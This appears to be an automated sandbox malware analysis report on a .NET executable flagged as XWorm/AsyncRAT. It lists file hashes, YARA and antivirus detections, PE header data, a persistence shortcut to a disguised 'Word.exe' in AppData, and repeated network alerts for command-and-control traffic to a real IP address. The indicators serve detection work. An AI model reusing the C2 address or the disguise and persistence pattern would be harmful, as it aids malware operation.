                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Fri Nov 29 15:14:30 2024, mtime=Fri Nov 29 15:14:30 2024, atime=Fri Nov 29 15:14:30 2024, length=445952, window=hide
                                                                Category:dropped
                                                                Size (bytes):751
                                                                Entropy (8bit):5.114229217806899
                                                                Encrypted:false
                                                                SSDEEP:12:8HoO4dHN+2ChTzi1Y//h4GkSLYkT58ZWjA7NHM8KUmnzZrNrzBmV:8HadM2Cz9p41sTuQAYnzhttm
                                                                MD5:19B373C62DE6143CA961B31C45B685D6
                                                                SHA1:62A7555E38561DFC5583C904AB5B776C7C78E0D6
                                                                SHA-256:E1F142B8F416450D00418C25BCFBE24BFDA92D8C4C223060638633D77E397524
                                                                SHA-512:62C5F85745170D13E02491763C9D54F7D33C0CBDD0C60C686DB6C40B9D11FD9A948797C249C86DB7FA99E16FCB8DFC6ACDCBD780AED59228F5F6501ECF912C2C
                                                                Malicious:false
                                                                Preview:L..................F.... ....^..yB...^..yB...^..yB..........................n.:..DG..Yr?.D..U..k0.&...&......Qg.*_.....~.iB...5..yB......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=}Y...........................3*N.A.p.p.D.a.t.a...B.V.1.....}Y`r..Roaming.@......EW.=}Y`r..........................'_..R.o.a.m.i.n.g.....Z.2.....}Y. .Word.exe..B......}Y.}Y.....! ....................jE#.W.o.r.d...e.x.e.......Z...............-.......Y............'.L.....C:\Users\user\AppData\Roaming\Word.exe........\.....\.....\.....\.....\.W.o.r.d...e.x.e.`.......X.......141700...........hT..CrF.f4... .]I..l....,......hT..CrF.f4... .]I..l....,......E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                                Process:C:\Users\user\Desktop\file.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):445952
                                                                Entropy (8bit):3.1734028805631276
                                                                Encrypted:false
                                                                SSDEEP:1536:5JVcMJ4tjdLCPwUtdcbwdpmnC6QOvdtvMd5S4Z96:504oBCxtdcbwd9O1RcS4ZE
                                                                MD5:9FF920C7C3199DBFFF9B507272C9F65A
                                                                SHA1:8A588FB79066649ADCDF2F5F1614D6858F0E4AC6
                                                                SHA-256:F790A1104F5EEC4B7C03064D9063C9E69D1F55E5BCE27AD83474FB2AA00310E9
                                                                SHA-512:BF3972D2BB7D819E6448651F14E7B465D3A4C92E2ECF747803FBC8E7E9E6CFF6B693E972F9729D56FB320316E2E51C751907E99EAE42F9309DB0241998954877
                                                                Malicious:true
                                                                Yara Hits:
                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Roaming\Word.exe, Author: Joe Security
                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Word.exe, Author: Joe Security
                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Roaming\Word.exe, Author: ditekSHen
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 76%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...uD;g............................><... ...@....@.. ....................... ............@..................................;..O....@.............................................................................. ............... ..H............text...D.... ...................... ..`.rsrc.......@....... ..............@..@.reloc..............................@..B................ <......H........n..........&.....................................................(....*.r...p*. .8F.*..(....*.r!..p*. [.x.*.s.........s.........s.........s.........*.rA..p*. .y4.*.ra..p*. ...*.r...p*. *p{.*.r...p*. ....*.r...p*. /?..*..((...*.r...p*. u}..*.r...p*. S...*.(+...-.(,...,.+.(-...,.+.(*...,.+.()...,..(Z...*"(....+.*&('...&+.*.+5sk... .... .'..ol...(,...~....-.(_...(Q...~....om...&.-.*.r...p*. ....*.r...p*. ....*.r?..p*. S...*.r_..p*. .B].*.r...p*. ....*.r...p*. ...*.r..
                                                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Entropy (8bit):3.1734028805631276
                                                                TrID:
                                                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                • Generic Win/DOS Executable (2004/3) 0.01%
                                                                • DOS Executable Generic (2002/1) 0.01%
                                                                File name:file.exe
                                                                File size:445'952 bytes
                                                                MD5:9ff920c7c3199dbfff9b507272c9f65a
                                                                SHA1:8a588fb79066649adcdf2f5f1614d6858f0e4ac6
                                                                SHA256:f790a1104f5eec4b7c03064d9063c9e69d1f55e5bce27ad83474fb2aa00310e9
                                                                SHA512:bf3972d2bb7d819e6448651f14e7b465d3a4c92e2ecf747803fbc8e7e9e6cff6b693e972f9729d56fb320316e2e51c751907e99eae42f9309db0241998954877
                                                                SSDEEP:1536:5JVcMJ4tjdLCPwUtdcbwdpmnC6QOvdtvMd5S4Z96:504oBCxtdcbwd9O1RcS4ZE
                                                                TLSH:9794C62F7F52797AC3BD56BF0810B1498978AD229AD9F20B385FF71C6D39D064A05382
                                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...uD;g............................><... ...@....@.. ....................... ............@................................
                                                                Icon Hash:33d8989292d8d827
                                                                Entrypoint:0x413c3e
                                                                Entrypoint Section:.text
                                                                Digitally signed:false
                                                                Imagebase:0x400000
                                                                Subsystem:windows gui
                                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                Time Stamp:0x673B4475 [Mon Nov 18 13:43:17 2024 UTC]
                                                                TLS Callbacks:
                                                                CLR (.Net) Version:
                                                                OS Version Major:4
                                                                OS Version Minor:0
                                                                File Version Major:4
                                                                File Version Minor:0
                                                                Subsystem Version Major:4
                                                                Subsystem Version Minor:0
                                                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                Instruction
                                                                jmp dword ptr [00402000h]
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                add byte ptr [eax], al
                                                                NameVirtual AddressVirtual Size Is in Section
                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x13bec0x4f.text
                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x140000x5abda.rsrc
                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x700000xc.reloc
                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                .text0x20000x11c440x11e00980f7ab8f1531ec7fff51b3ead31fd69False0.5830146416083916data6.093314319391307IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                .rsrc0x140000x5abda0x5ac00f9a01a8dd066ec89a1da125de87bc9cbFalse0.0315217157369146data2.176526481551807IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                .reloc0x700000xc0x200aeb523c786010dcdf9d7d6feb41615b6False0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                RT_ICON0x142200x42028Device independent bitmap graphic, 256 x 512 x 32, image size 262144, resolution 2835 x 2835 px/m0.02073039027132586
                                                                RT_ICON0x562480x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2835 x 2835 px/m0.2632978723404255
                                                                RT_ICON0x566b00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2835 x 2835 px/m0.09398340248962656
                                                                RT_ICON0x58c580x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2835 x 2835 px/m0.15806754221388367
                                                                RT_ICON0x59d000x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 2835 x 2835 px/m0.03714657518040932
                                                                RT_ICON0x6a5280x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 2835 x 2835 px/m0.07345299952763344
                                                                RT_GROUP_ICON0x6e7500x5adata0.7111111111111111
                                                                RT_VERSION0x6e7ac0x244data0.4724137931034483
                                                                RT_MANIFEST0x6e9f00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5469387755102041
                                                                DLLImport
                                                                mscoree.dll_CorExeMain
                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                2024-11-29T15:20:14.029990+01002853192ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound1192.168.2.749806103.230.121.1247000TCP
                                                                2024-11-29T15:20:15.306150+01002853191ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound1103.230.121.1247000192.168.2.749806TCP
                                                                2024-11-29T15:20:15.806058+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:15.806058+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:15.926061+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:15.926061+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.046078+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.046078+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.166168+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.166168+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.287698+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.287698+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.408129+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.408129+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.528343+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.528343+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.648418+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.648418+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.888810+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:16.888810+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.009313+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.009313+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.132028+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.132028+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.252230+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.252230+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.376092+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.376092+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.496165+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.496165+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.660928+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.660928+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.781033+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.781033+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.901100+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:17.901100+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.021425+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.021425+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.141579+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.141579+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.262076+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.262076+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.424695+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.424695+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.545159+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.545159+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.665339+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.665339+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.786270+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.786270+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.906505+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.906505+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.966388+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:18.966388+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.086730+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.086730+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.206697+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.206697+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.327415+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.327415+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.447502+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.447502+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.567736+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.567736+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.785059+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.785059+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.905186+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:19.905186+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:20.025248+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:20.025248+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:20.145348+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:20.145348+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:20.265461+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:20.265461+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:20.381652+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:20.381652+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:20.501705+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:20.501705+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:20.622209+01002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.749829103.230.121.1247000TCP
                                                                2024-11-29T15:20:20.622209+01002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.749829103.230.121.1247000TCP
